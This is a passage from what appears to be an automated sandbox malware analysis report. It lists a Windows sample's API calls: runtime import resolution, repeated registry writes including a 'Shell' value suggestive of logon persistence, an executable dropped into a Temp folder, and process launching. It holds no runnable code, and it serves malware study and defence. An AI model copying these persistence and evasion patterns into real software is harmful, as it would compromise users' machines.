4063b2 RegSetValueExA RegCloseKey Sleep 30362->30363 30364 413410 lstrcpyA 30363->30364 30365 4063f4 RegCreateKeyExA Sleep 30364->30365 30366 413410 lstrcpyA 30365->30366 30367 406421 RegSetValueExA RegCloseKey Sleep 30366->30367 30368 413410 lstrcpyA 30367->30368 30369 40645c RegCreateKeyExA Sleep 30368->30369 30370 413410 lstrcpyA 30369->30370 30371 406489 RegSetValueExA RegCloseKey Sleep 30370->30371 30372 413410 lstrcpyA 30371->30372 30373 4064cb RegCreateKeyExA 30372->30373 30374 413410 lstrcpyA 30373->30374 30375 4064f4 RegSetValueExA RegCloseKey Sleep 30374->30375 30376 413410 lstrcpyA 30375->30376 30377 406536 RegCreateKeyExA 30376->30377 30378 413410 lstrcpyA 30377->30378 30379 40655f RegSetValueExA Sleep 30378->30379 30380 413410 lstrcpyA 30379->30380 30381 40658a RegSetValueExA Sleep 30380->30381 30382 413410 lstrcpyA 30381->30382 30383 4065b5 RegSetValueExA Sleep 30382->30383 30384 413410 lstrcpyA 30383->30384 30385 4065e0 RegSetValueExA Sleep 30384->30385 30386 413410 lstrcpyA 30385->30386 30387 40660b RegSetValueExA Sleep 30386->30387 30388 413410 lstrcpyA 30387->30388 30389 406636 RegSetValueExA RegCloseKey Sleep 30388->30389 30389->30328 30390->30326 30391->30335 30393 423e06 GetCurrentProcess TerminateProcess 30392->30393 30394 423e16 30392->30394 30393->30394 30395 423eb5 30394->30395 30396 423d5c 3 API calls 30394->30396 30395->29413 30396->30395 30436 41cc10 11 API calls 30397 40d092 30400 40d016 30397->30400 30403 40d01e 30400->30403 30401 40c472 OpenMutexA CloseHandle lstrlenA lstrcpyA 30401->30403 30402 40cedf 34 API calls 30402->30403 30403->30401 30403->30402 30404 40d08b 30403->30404 30405 40c4ce 5 API calls 30403->30405 30406 40d05f ShellExecuteA 30403->30406 30407 40d080 Sleep 30403->30407 30405->30403 30406->30403 30407->30403 30494 422a91 54 API calls 30437 41f114 17 API calls 30495 41cf94 11 API calls 30438 426118 ExitProcess 30439 40901b 30 API calls 30497 42379e 49 API calls 30498 401f9d 242 API calls 30499 41469f 55 API calls 30441 425123 6 API calls 30500 4056a7 406 API calls 30502 4246ab 20 API calls 30503 403f74 359 API calls 30444 423b2e 13 API calls 30504 4248ae 37 API calls 30505 4126ae shutdown GetTickCount GetTickCount GetTickCount Sleep 30506 408cb0 145 API calls 30507 4095b5 45 API calls 30446 422d35 UnhandledExceptionFilter 30448 40683c 153 API calls 30449 40604a 144 API calls 30448->30449 30450 41ea3d 294 API calls 30451 40d83e 204 API calls 30452 4157a7 273 API calls 30451->30452 30453 411206 125 API calls 30451->30453 30454 4116a8 26 API calls 30451->30454 30455 415d7a 105 API calls 30451->30455 30456 41272f 146 API calls 30451->30456 30457 41c19e 229 API calls 30451->30457 30458 4218d6 Sleep EnterCriticalSection EnumWindows Sleep 30457->30458 30459 41c62e EnterCriticalSection EnumWindows Sleep LeaveCriticalSection 30457->30459
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,776AC310,00000000,00000000), ref: 0040A96C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040A99C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040A9BB
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040A9DA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040A9F9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA18
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA37
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA56
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA75
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA94
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AAB3
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AAD2
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AAF1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AB10
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AB2F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AB4E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ABCF
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040ABE1
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040AC0D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AC35
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AC54
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AC73
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AC92
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ACB1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ACD0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ACEF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AD0E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AD2D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AD4C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ADB9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ADD8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ADF7
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AE16
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AE5B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AE7A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AE99
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AEB8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AED7
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AEF6
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF15
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF34
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040AF6D
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040AF99
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AFC1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AFE0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AFFF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B01E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B03D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B05C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B07B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B09A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B0B9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B0D8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B145
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B164
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B183
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1A2
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1C1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1E0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1FF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B21E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B267
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B286
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B2A5
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B2C4
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B2E3
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B302
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B321
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B340
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B35F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B37E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B39D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B3BC
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B3DB
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B3FA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B419
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B438
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B457
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B4F4
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040B501
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040B52D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B555
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B574
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B593
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B5B2
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B5D1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B5F0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B60F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B62E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B64D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B66C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B68B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B6AA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B6C9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B6E8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B707
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B726
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B745
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B764
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B783
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B7A2
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B7C1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B7E0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B7FF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B81E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B83D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B85C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B87B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B89A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B8B9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B8D8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B8F7
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B916
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BA33
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BA5F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BA87
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BAA6
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BAC5
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BAE4
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB03
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB22
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB41
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB60
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB7F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB9E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BBBD
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BC46
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BC6E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BC8D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BCAC
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BCCB
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BCEA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BD09
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BD3A
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BD66
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BD8A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BDA9
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BDBE
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BDEA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE12
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE31
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE50
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE6F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE8E
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BEB3
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BEE5
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BF08
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BF29
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BF3A
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BF66
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BF89
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BFAA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BFCB
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BFE9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040C009
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$ErrorLast$HandleModule
                                                                                                                                                                                                                                                      • String ID: \&LUk
                                                                                                                                                                                                                                                      • API String ID: 1445086619-3669246032
                                                                                                                                                                                                                                                      • Opcode ID: 559059990ff643097508b6262fd03eeb35fb8387410a21d0e2ae341eea3bf3a4
                                                                                                                                                                                                                                                      • Instruction ID: fe00ecd7844f749915d9149580f3465eef428d98f78ac84402cf4c52ab4222cc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 559059990ff643097508b6262fd03eeb35fb8387410a21d0e2ae341eea3bf3a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4C2E1F5D40314AFE751AF50AC82EBA36ACD714705F14057FFA04E1192EFB85A848FAA

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040C812
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0040C865
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040C895
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040C8A8
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,Shell,00000000,00000001,?,00000000), ref: 0040C8BD
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040C8C6
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040C8CE
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040C932
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040C949
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040C952
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040C95A
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040C986
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A778), ref: 0040C9C3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040C9CB
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040C9D4
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040C9F4
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040C9FC
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040CA28
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CA60
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CA77
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040CA80
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CA88
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,?,00000000), ref: 0040CAB4
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CAEC
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CB03
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CB0C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CB14
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,?,00000000), ref: 0040CB40
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A778), ref: 0040CB7D
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CB8A
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CBA1
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040CBAA
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CBB2
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 0040CBC0
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CBCD
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040CC03
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CC36
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CC4D
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040CC56
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CC5E
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040CC8A
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A778), ref: 0040CCC3
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CCD0
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CCE7
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040CCF0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CCF8
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040CD24
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CD58
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CD6F
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040CD78
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CD80
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0040C8FA
                                                                                                                                                                                                                                                        • Part of subcall function 004136FF: lstrlenA.KERNEL32(4941262305804196,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0040C034,?,00000000,0040D80A), ref: 00413708
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                        • Part of subcall function 0040C7B4: lstrcatA.KERNEL32(76AF0F00,.exe,76AF0F00,0040CE0C,?,?,-00000004), ref: 0040C7D6
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 0040CD9B
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CDA8
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CDB6
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,?,00000000), ref: 0040CDE2
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CE16
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CE2D
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CE36
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CE3E
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,?,00000000), ref: 0040CE6A
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A778), ref: 0040CEA3
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CEB0
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CEC7
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040CED0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CED8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
